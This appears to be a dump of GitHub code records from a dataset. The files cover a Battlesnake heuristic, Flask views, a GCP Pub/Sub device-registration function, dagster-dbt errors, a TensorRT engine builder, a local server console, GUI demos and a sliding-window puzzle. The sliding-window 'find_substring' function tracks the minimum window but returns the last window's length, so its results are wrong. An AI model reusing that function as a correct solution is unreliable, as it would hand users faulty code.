json[\"you\"][\"body\"]\n i, j = your_snake_body[0][\"y\"], your_snake_body[0][\"x\"]\n \n # Set food_direction towards food\n food = state[:, :, self.FOOD_INDEX]\n \n # Note that there is a -1 border around state so i = i + 1, j = j + 1\n if -1 in state:\n i, j = i+1, j+1\n \n food_direction = None\n if food[i-1, j] == 1:\n food_direction = 0 # up\n if food[i+1, j] == 1:\n food_direction = 1 # down\n if food[i, j-1] == 1:\n food_direction = 2 # left\n if food[i, j+1] == 1:\n food_direction = 3 # right\n return food_direction\n \n def run(self, state, snake_id, turn_count, health, json, action):\n '''\n The main function of the heuristics.\n \n Parameters:\n -----------\n `state`: np.array of size (map_size[0]+2, map_size[1]+2, 1+number_of_snakes)\n Provides the current observation of the gym.\n Your target snake is state[:, :, snake_id+1]\n \n `snake_id`: int\n Indicates the id where id \\in [0...number_of_snakes]\n \n `turn_count`: int\n Indicates the number of elapsed turns\n \n `health`: dict\n Indicates the health of all snakes in the form of {int: snake_id: int:health}\n \n `json`: dict\n Provides the same information as above, in the same format as the battlesnake engine.\n\n `action`: 
np.array of size 4\n The qvalues of the actions calculated. The 4 values correspond to [up, down, left, right]\n '''\n log_string = \"\"\n # The default `best_action` to take is the one that provides has the largest Q value.\n # If you think of something else, you can edit how `best_action` is calculated\n best_action = int(np.argmax(action))\n \n # Example heuristics to eat food that you are close to.\n if health[snake_id] < 30:\n food_direction = self.go_to_food_if_close(state, json)\n if food_direction:\n best_action = food_direction\n log_string = \"Went to food if close.\"\n \n\n # TO DO, add your own heuristics\n \n assert best_action in [0, 1, 2, 3], \"{} is not a valid action.\".format(best_action)\n return best_action, log_string","repo_name":"awslabs/sagemaker-battlesnake-ai","sub_path":"source/MXNetEnv/inference/inference_src/battlesnake_heuristics.py","file_name":"battlesnake_heuristics.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"} +{"seq_id":"28447897329","text":"import datetime\n\nfrom flask import (Blueprint, redirect, url_for, current_app,\n request, flash, render_template)\n\nfrom web.extensions import db\nfrom web.utils.helpers import (randomizer)\nfrom web.utils.helpers import (render_markup)\nfrom web.index.models import (posts, technologies, solutions, Randomizer)\n\nindex = Blueprint(\"index\", __name__)\n\n@index.route('/')\ndef _index():\n conf = {\n 'title' : 'Search Engine',\n 'slogan': 'Not Google.',\n\n 'sidebar': True,\n 'footer': True,\n 'rand': randomizer(),\n 'user_level': 2,\n }\n\n markup = render_markup(\"\"\"\n# Chapter #\n\n## Section ##\n\n* Item 1\n* Item 2\n \"\"\")\n\n return render_template('index/index.html', \n conf = conf,\n solutions = solutions,\n technologies = technologies,\n posts = posts,\n m = markup,\n c = request.headers.get('CF-IPCountry'))\n\n@index.route('/plans')\ndef plans():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/plans.html', conf=conf)\n\n@index.route('/spider')\ndef spider():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/spider.html', conf=conf)","repo_name":"hoytnix/spidey","sub_path":"httpd/web/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3272235643","text":"import base64\nfrom operator import sub\nfrom google.cloud import firestore\nfrom google.cloud import pubsub_v1\nimport json\n\n# Declare the project ID\nproject_id = \"niyoproject-306620\"\n\n# Connect to Firestore DB (Native Mode)\ndb = firestore.Client(project=project_id)\n# Set active collection to user\nreaders = db.collection(u'readers')\n\n# Initiate Publisher and Subscriber for PubSub\npublisher = pubsub_v1.PublisherClient()\nsubscriber = pubsub_v1.SubscriberClient()\nsubscriber_web = pubsub_v1.SubscriberClient()\n\ndef register_device(reader_id):\n # First, create an entry on Firestore\n data = {\n u'action': u'none',\n u'amount': 0\n }\n readers.document(reader_id).set(data)\n\n # Then, create a topic in PubSub with the reader_id\n topic_id = reader_id\n topic_path = publisher.topic_path(project_id, topic_id)\n if topic_path not in [topic.name 
for topic in publisher.list_topics(request = {'project': f'projects/{project_id}'})]:\n topic = publisher.create_topic(request={\"name\": topic_path})\n print(f'Topic {topic_path} created successfully!')\n subscription_path = subscriber.subscription_path(project_id, topic_id)\n subscription_path_web = subscriber_web.subscription_path(project_id, topic_id + \"_web\")\n if subscription_path not in [subs for subs in publisher.list_topic_subscriptions(request = {'topic': topic_path})]:\n with subscriber:\n subscription = subscriber.create_subscription(\n request = {'name': subscription_path, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path} created successfully!')\n with subscriber_web:\n subscription_web = subscriber_web.create_subscription(\n request = {'name': subscription_path_web, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path_web} created successfully!')\n else:\n print(f'Subscription {subscription_path} or {subscription_path_web} already exists, skipping!')\n else:\n print(f'Topic {topic_path} already exists, skipping!')\n \n\n\n\ndef main(event, context):\n \"\"\"Triggered from a message on a Cloud Pub/Sub topic.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n data = json.loads(pubsub_message)\n\n print(\"Reader ID:\" + str(data[\"reader_id\"]))\n\n register_device(data[\"reader_id\"])\n","repo_name":"xprilion/KolPay","sub_path":"cloud_functions/register-device.py","file_name":"register-device.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"9892371367","text":"import warnings\nfrom abc import ABC\nfrom typing import Any, Mapping, Optional, Sequence\n\nfrom dagster import (\n DagsterInvariantViolationError,\n Failure,\n MetadataValue,\n _check as check,\n)\n\n\nclass DagsterDbtError(Failure, ABC):\n \"\"\"The base exception of the ``dagster-dbt`` library.\"\"\"\n\n\nclass DagsterDbtCliUnexpectedOutputError(DagsterDbtError):\n \"\"\"Represents an error when parsing the output of a dbt CLI command.\"\"\"\n\n invalid_line_nos: Sequence[int]\n\n def __init__(self, invalid_line_nos: Sequence[int]):\n check.sequence_param(invalid_line_nos, \"invalid_line_nos\", int)\n line_nos_str = \", \".join(map(str, invalid_line_nos))\n description = f\"dbt CLI emitted unexpected output on lines {line_nos_str}\"\n metadata = {\n \"Invalid CLI Output Line Numbers\": MetadataValue.json({\"line_nos\": invalid_line_nos})\n }\n super().__init__(description, metadata=metadata)\n self.invalid_line_nos = invalid_line_nos\n\n\nclass DagsterDbtCliRuntimeError(DagsterDbtError, ABC):\n \"\"\"Represents an error while executing a dbt CLI command.\"\"\"\n\n def __init__(\n self,\n description: str,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n if logs is not None:\n warnings.warn(\n \"`logs` is a deprecated argument to DagsterDbtCliRuntimeError and will be discarded\"\n )\n if raw_output is not None:\n warnings.warn(\n \"`raw_output` is a deprecated argument to DagsterDbtCliRuntimeError and will be\"\n \" discarded\"\n )\n metadata = {\"Parsed CLI Messages\": \"\\n\".join(messages or [])}\n super().__init__(description, metadata=metadata)\n\n\nclass 
DagsterDbtCliHandledRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a model error reported by the dbt CLI at runtime (return code 1).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\"Handled error in the dbt CLI (return code 1)\", logs, raw_output, messages)\n\n\nclass DagsterDbtCliFatalRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a fatal error in the dbt CLI (return code 2).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\n \"Fatal error in the dbt CLI (return code 2): \" + \" \".join(messages or []),\n logs,\n raw_output,\n messages,\n )\n\n\nclass DagsterDbtCliOutputsNotFoundError(DagsterDbtError):\n \"\"\"Represents a problem in finding the ``target/run_results.json`` artifact when executing a dbt\n CLI command.\n\n For more details on ``target/run_results.json``, see\n https://docs.getdbt.com/reference/dbt-artifacts#run_resultsjson.\n \"\"\"\n\n def __init__(self, path: str):\n super().__init__(f\"Expected to find file at path {path}\")\n\n\nclass DagsterDbtCloudJobInvariantViolationError(DagsterDbtError, DagsterInvariantViolationError):\n \"\"\"Represents an error when a dbt Cloud job is not supported by the ``dagster-dbt`` library.\"\"\"\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"20612446391","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys\nimport traceback\n\ntry:\n import tensorrt as trt # noqa pylint: disable=W0611 pylint: disable=W0611\n # Get TensorRT version number.\n [NV_TENSORRT_MAJOR, NV_TENSORRT_MINOR, NV_TENSORRT_PATCH, _] = [\n int(item) for item\n in trt.__version__.split(\".\")\n ]\n trt_available = True\nexcept Exception as e:\n logger = logging.getLogger(__name__)\n logger.warning(\n \"Failed to import TensorRT package, exporting TLT to a TensorRT engine \"\n \"will not be available.\"\n )\n trt_available = False\n\n\n# Default TensorRT parameters.\nDEFAULT_MAX_WORKSPACE_SIZE = 2 * (1 << 30)\nDEFAULT_MAX_BATCH_SIZE = 1\n\n\n# Define logger.\nlogger = logging.getLogger(__name__)\n\n\ndef _create_tensorrt_logger(verbose=False):\n \"\"\"Create a TensorRT logger.\n\n Args:\n verbose(bool): Flag to set logger as verbose or not.\n Return:\n tensorrt_logger(trt.infer.ConsoleLogger): TensorRT console logger object.\n \"\"\"\n if str(os.getenv('SUPPRES_VERBOSE_LOGGING', '0')) == '1':\n # Do not print any warnings in TLT docker\n trt_verbosity = trt.Logger.Severity.ERROR\n elif verbose:\n trt_verbosity = trt.Logger.INFO\n else:\n trt_verbosity = trt.Logger.WARNING\n tensorrt_logger = trt.Logger(trt_verbosity)\n return tensorrt_logger\n\n\ndef _set_excluded_layer_precision(network, fp32_layer_names, fp16_layer_names):\n \"\"\"When generating an INT8 model, it sets excluded layers' precision as fp32 or fp16.\n\n In detail, this function is only used when generating INT8 TensorRT models. It accepts\n two lists of layer names: (1). for the layers in fp32_layer_names, their precision will\n be set as fp32; (2). 
for those in fp16_layer_names, their precision will be set as fp16.\n\n Args:\n network: TensorRT network object.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. These layers use fp16.\n \"\"\"\n is_mixed_precision = False\n use_fp16_mode = False\n\n for i, layer in enumerate(network):\n if any(s in layer.name for s in fp32_layer_names):\n is_mixed_precision = True\n layer.precision = trt.float32\n layer.set_output_type(0, trt.float32)\n logger.info(\"fp32 index: %d; name: %s\", i, layer.name)\n elif any(s in layer.name for s in fp16_layer_names):\n is_mixed_precision = True\n use_fp16_mode = True\n layer.precision = trt.float16\n layer.set_output_type(0, trt.float16)\n logger.info(\"fp16 index: %d; name: %s\", i, layer.name)\n else:\n layer.precision = trt.int8\n layer.set_output_type(0, trt.int8)\n\n return is_mixed_precision, use_fp16_mode\n\n\nclass EngineBuilder(object):\n \"\"\"Create a TensorRT engine.\n\n Args:\n filename (list): List of filenames to load model from.\n max_batch_size (int): Maximum batch size.\n vmax_workspace_size (int): Maximum workspace size.\n dtype (str): data type ('fp32', 'fp16' or 'int8').\n calibrator (:any:`Calibrator`): Calibrator to use for INT8 optimization.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. These layers use fp16.\n verbose (bool): Whether to turn on verbose mode.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n strict_type(bool): Whether or not to apply strict_type_constraints for INT8 mode.\n \"\"\"\n\n def __init__(\n self,\n filenames,\n max_batch_size=DEFAULT_MAX_BATCH_SIZE,\n max_workspace_size=DEFAULT_MAX_WORKSPACE_SIZE,\n dtype=\"fp32\",\n calibrator=None,\n fp32_layer_names=None,\n fp16_layer_names=None,\n verbose=False,\n tensor_scale_dict=None,\n strict_type=False,\n ):\n \"\"\"Initialization routine.\"\"\"\n if dtype == \"int8\":\n self._dtype = trt.DataType.INT8\n elif dtype == \"fp16\":\n self._dtype = trt.DataType.HALF\n elif dtype == \"fp32\":\n self._dtype = trt.DataType.FLOAT\n else:\n raise ValueError(\"Unsupported data type: %s\" % dtype)\n self._strict_type = strict_type\n if fp32_layer_names is None:\n fp32_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP32 layer precision could be set only when dtype is INT8\"\n )\n\n if fp16_layer_names is None:\n fp16_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP16 layer precision could be set only when dtype is INT8\"\n )\n\n self._fp32_layer_names = fp32_layer_names\n self._fp16_layer_names = fp16_layer_names\n\n self._tensorrt_logger = _create_tensorrt_logger(verbose)\n builder = trt.Builder(self._tensorrt_logger)\n config = builder.create_builder_config()\n trt.init_libnvinfer_plugins(self._tensorrt_logger, \"\")\n if self._dtype == trt.DataType.HALF and not builder.platform_has_fast_fp16:\n logger.error(\"Specified FP16 but not supported on platform.\")\n raise AttributeError(\n \"Specified FP16 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8 and not builder.platform_has_fast_int8:\n logger.error(\"Specified INT8 but not supported on platform.\")\n raise AttributeError(\n \"Specified INT8 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8:\n if tensor_scale_dict is None and calibrator is None:\n logger.error(\"Specified INT8 but neither calibrator \"\n \"nor tensor_scale_dict is provided.\")\n 
raise AttributeError(\"Specified INT8 but no calibrator \"\n \"or tensor_scale_dict is provided.\")\n\n network = builder.create_network()\n\n self._load_from_files(filenames, network)\n\n builder.max_batch_size = max_batch_size\n config.max_workspace_size = max_workspace_size\n\n if self._dtype == trt.DataType.HALF:\n config.set_flag(trt.BuilderFlag.FP16)\n\n if self._dtype == trt.DataType.INT8:\n config.set_flag(trt.BuilderFlag.INT8)\n if tensor_scale_dict is None:\n config.int8_calibrator = calibrator\n # When use mixed precision, for TensorRT builder:\n # strict_type_constraints needs to be True;\n # fp16_mode needs to be True if any layer uses fp16 precision.\n set_strict_types, set_fp16_mode = \\\n _set_excluded_layer_precision(\n network=network,\n fp32_layer_names=self._fp32_layer_names,\n fp16_layer_names=self._fp16_layer_names,\n )\n if set_strict_types:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n if set_fp16_mode:\n config.set_flag(trt.BuilderFlag.FP16)\n else:\n # Discrete Volta GPUs don't have int8 tensor cores. So TensorRT might\n # not pick int8 implementation over fp16 or even fp32 for V100\n # GPUs found on data centers (e.g., AVDC). This will be a discrepancy\n # compared to Turing GPUs including d-GPU of DDPX and also Xavier i-GPU\n # both of which have int8 accelerators. We set the builder to strict\n # mode to avoid picking higher precision implementation even if they are\n # faster.\n if self._strict_type:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n else:\n config.set_flag(trt.BuilderFlag.FP16)\n self._set_tensor_dynamic_ranges(\n network=network, tensor_scale_dict=tensor_scale_dict\n )\n\n engine = builder.build_engine(network, config)\n\n try:\n assert engine\n except AssertionError:\n logger.error(\"Failed to create engine\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"Parsing failed on line {} in statement {}\".format(\n line, text)\n )\n\n self._engine = engine\n\n def _load_from_files(self, filenames, network):\n \"\"\"Load an engine from files.\"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def _set_tensor_dynamic_ranges(network, tensor_scale_dict):\n \"\"\"Set the scaling factors obtained from quantization-aware training.\n\n Args:\n network: TensorRT network object.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n \"\"\"\n tensors_found = []\n for idx in range(network.num_inputs):\n input_tensor = network.get_input(idx)\n if input_tensor.name in tensor_scale_dict:\n tensors_found.append(input_tensor.name)\n cal_scale = tensor_scale_dict[input_tensor.name]\n input_tensor.dynamic_range = (-cal_scale, cal_scale)\n\n for layer in network:\n found_all_outputs = True\n for idx in range(layer.num_outputs):\n output_tensor = layer.get_output(idx)\n if output_tensor.name in tensor_scale_dict:\n tensors_found.append(output_tensor.name)\n cal_scale = tensor_scale_dict[output_tensor.name]\n output_tensor.dynamic_range = (-cal_scale, cal_scale)\n else:\n found_all_outputs = False\n if found_all_outputs:\n layer.precision = trt.int8\n tensors_in_dict = tensor_scale_dict.keys()\n assert set(tensors_in_dict) == set(tensors_found), (\n \"Some of the tensor names specified in tensor \"\n \"scale dictionary was not found in the network.\"\n )\n\n def get_engine(self):\n \"\"\"Return the engine that was built by the instance.\"\"\"\n return self._engine\n\n\nclass UFFEngineBuilder(EngineBuilder):\n 
\"\"\"Create a TensorRT engine from a UFF file.\n\n Args:\n filename (str): UFF file to create engine from.\n input_node_name (str): Name of the input node.\n input_dims (list): Dimensions of the input tensor.\n output_node_names (list): Names of the output nodes.\n \"\"\"\n\n def __init__(\n self,\n filename,\n input_node_name,\n input_dims,\n output_node_names,\n *args,\n **kwargs\n ):\n \"\"\"Init routine.\"\"\"\n self._input_node_name = input_node_name\n if not isinstance(output_node_names, list):\n output_node_names = [output_node_names]\n self._output_node_names = output_node_names\n self._input_dims = input_dims\n\n super(UFFEngineBuilder, self).__init__([filename], *args, **kwargs)\n\n def _load_from_files(self, filenames, network):\n filename = filenames[0]\n parser = trt.UffParser()\n for key, value in self._input_dims.items():\n parser.register_input(key, value, trt.UffInputOrder(0))\n for name in self._output_node_names:\n parser.register_output(name)\n try:\n assert parser.parse(filename, network, trt.DataType.FLOAT)\n except AssertionError:\n logger.error(\"Failed to parse UFF File\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"UFF parsing failed on line {} in statement {}\".format(line, text)\n )\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/common/export/trt_utils.py","file_name":"trt_utils.py","file_ext":"py","file_size_in_byte":12144,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22023386358","text":"#consola del servidor (archivo de control)\n#este archivo forma parte de la estructura del servidor\n#este archivo sirve para el manejo del servidor durante la ejecucion\n\nimport sys\nimport os\n\n\n#lista de comandos\n#estos comandos no se ejecutan a la vez que el archivo del servidor\n\nrun = 'python main.py'\nlogs = 'cat logs.txt'\nhelp = 'help'\nclear = 'clear'\nmaintenance = 'python maintenance.py'\n\n \ncommands = ['run', 'logs','help', 'clear', 'maintenance']\n\nprint('Consola del servidor iniciada')\nwhile True:\n command = str(input())\n\n if command == 'run':\n \n print('')\n os.system(run)\n \n elif command == 'logs':\n \n print('')\n os.system(logs)\n \n elif command == 'help':\n \n for i in range(0, len(commands)):\n print('')\n print(commands[i])\n print('')\n \n elif command == 'clear':\n \n print('')\n os.system(clear)\n print('')\n \n elif command == 'maintenance':\n \n print('')\n #maintenance commands\n print('Lista de comandos del sistema de mantenimiento:')\n print('')\n print('-users --> Grafica del numero de usuarios')\n print('')\n \n command = str(input())\n if command == 'users':\n from maintenance import num_users\n else : \n print('Comando no valido') \n \n","repo_name":"Pachec00/Server","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8844199457","text":"\nimport math\ndef find_substring(str, pattern):\n\tunique_pattern_chars = set(pattern)\n\tfrequency_dict = {}\n\twindow_start, min_length, dict_keys, m = 0, math.inf, 0, 0\n\n\tfor window_end in range(len(str)):\n\t\tright_char = str[window_end]\n\n\t\tif right_char in unique_pattern_chars:\n\t\t\tif right_char not in frequency_dict:\n\t\t\t\tfrequency_dict[right_char] = 0\n\t\t\t\tdict_keys += 1\n\n\t\t\tfrequency_dict[right_char] 
+= 1\n\t\t\n\t\twhile dict_keys == len(unique_pattern_chars):\n\t\t\tmin_length = min(min_length, window_end - window_start + 1)\n\n\t\t\tleft_char = str[window_start]\n\t\t\tif left_char in unique_pattern_chars:\n\t\t\t\tfrequency_dict[left_char] -= 1\n\t\t\t\tif frequency_dict[left_char] == 0:\n\t\t\t\t\tdict_keys -= 1\n\t\t\t# else:\n\t\t\twindow_start += 1\n\n\tif min_length != math.inf:\n\t\tm = window_end - window_start + 1\n\t\treturn m\n\telse:\n\t\treturn 0\n\n\ndef main():\n\tprint(find_substring(\"aabdec\", \"abc\"))\n\tprint(find_substring(\"abdabca\", \"abc\"))\n\tprint(find_substring(\"adcad\", \"abc\"))\n\nmain()","repo_name":"Rama189/Grokking-the-Coding-Interview-Patterns","sub_path":"1. Sliding window/Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_name":"Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26747047883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport sys\nfrom PySide2.QtWidgets import (\n QApplication,\n QWidget,\n QPushButton,\n QHBoxLayout,\n QVBoxLayout,\n QListWidget,\n QAbstractItemView,\n)\n\n\nclass MainWindow(QWidget):\n def __init__(self, trp):\n super().__init__()\n self.setWindowTitle(\"Task 1\")\n self.setGeometry(370, 390, 370, 390)\n self.lst1 = QListWidget()\n self.lst1.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst2 = QListWidget()\n self.lst2.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst1.addItems(trp)\n self.inp1 = QPushButton(\"Add\")\n self.inp2 = QPushButton(\"Remove\")\n self.setting()\n\n def setting(self):\n hbox = QHBoxLayout()\n vbox = QVBoxLayout()\n hbox.addWidget(self.lst1)\n hbox.addLayout(vbox)\n vbox.addWidget(self.inp1)\n vbox.addWidget(self.inp2)\n hbox.addWidget(self.lst2)\n self.setLayout(hbox)\n self.inp1.clicked.connect(self.toright)\n self.inp2.clicked.connect(self.toleft)\n self.inp1.setStyleSheet(\"background: purple\")\n self.inp2.setStyleSheet(\"background: blue\")\n\n def toright(self):\n listItems = self.lst1.selectedItems()\n for item in listItems:\n self.lst1.takeItem(self.lst1.row(item))\n self.lst2.addItem(item)\n\n def toleft(self):\n listItems = self.lst2.selectedItems()\n for item in listItems:\n self.lst2.takeItem(self.lst2.row(item))\n self.lst1.addItem(item)\n\n\ndef main():\n app = QApplication(sys.argv)\n trp = (\n \"Apple\",\n \"Bananas\",\n \"Carrot\",\n \"Butter\",\n \"Meat\",\n \"Potato\",\n \"Pineapple\"\n )\n application = MainWindow(trp)\n application.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Adelaide95/laba4.8-PySide2-","sub_path":"task 1.py","file_name":"task 1.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38816295088","text":"import tkinter\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkcalendar\r\nimport sqlite3\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image\r\nimport random\r\n\r\n\r\nmaster = Tk()\r\nmaster.title('WELCOME TO GRACIOUS APARTMENTS')\r\nsW = master.winfo_screenwidth()\r\nsH = master.winfo_screenheight()\r\naW = sW - 200\r\naH = sH - 100\r\nposx = (sW/2) - (aW/2)\r\nposy = (sH/2) - (aH/2)\r\nmaster.geometry(f'{aW}x{aH}+{int(posx)}+{int(posy)}')\r\nmaster.configure(background=\"#cfe0e8\")\r\n\r\n\r\n\r\ndef expandBlueG():\r\n 
lbl_Introg.configure(font=(\"arial\",100,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introg.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nLfrm_Gracious = LabelFrame(master, relief=\"groove\", bg=\"#ffcc5c\")\r\nLfrm_Gracious.grid(padx=100,pady=50)\r\nlbl_Introg = Label(Lfrm_Gracious, text=\"G\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introg.grid(row=1, column=3)\r\nlbl_Introg.after(3000, expandBlueG)\r\n\r\n\r\n\r\n#lbl_Intror = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1,column=4)\r\ndef expandBlueR():\r\n lbl_Intror.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intror.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nlbl_Intror = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intror.grid(row=1, column=4)\r\nlbl_Intror.after(4000, expandBlueR)\r\n\r\n#lbl_Introa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=5)\r\ndef expandBlueA():\r\n lbl_Introa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introa.after(5000, shrinkNormal)\r\nlbl_Introa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introa.grid(row=1, column=5)\r\nlbl_Introa.after(5000, expandBlueA)\r\n\r\n#lbl_Introc = Label(frm_Intro, text=\"C\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=6)\r\ndef expandBlueC():\r\n lbl_Introc.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introc.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introc.after(5000, shrinkNormal)\r\nlbl_Introc = Label(Lfrm_Gracious, text=\"C\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introc.grid(row=1, column=6)\r\nlbl_Introc.after(6000, expandBlueC)\r\n\r\n#lbl_Introi = Label(frm_Intro, text=\"I\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=7)\r\ndef expandBlueI():\r\n lbl_Introi.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introi.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introi.after(5000, shrinkNormal)\r\nlbl_Introi = Label(Lfrm_Gracious, text=\"I\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introi.grid(row=1, column=7)\r\nlbl_Introi.after(7000, expandBlueI)\r\n\r\n#lbl_Introo = Label(frm_Intro, text=\"O\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=8)\r\ndef expandBlueO():\r\n lbl_Introo.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introo.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introo.after(5000, shrinkNormal)\r\nlbl_Introo = Label(Lfrm_Gracious, text=\"O\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introo.grid(row=1, column=8)\r\nlbl_Introo.after(8000, expandBlueO)\r\n\r\n#lbl_Introu = Label(frm_Intro, text=\"U\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=9)\r\ndef expandBlueU():\r\n lbl_Introu.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introu.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introu.after(5000, shrinkNormal)\r\nlbl_Introu = Label(Lfrm_Gracious, 
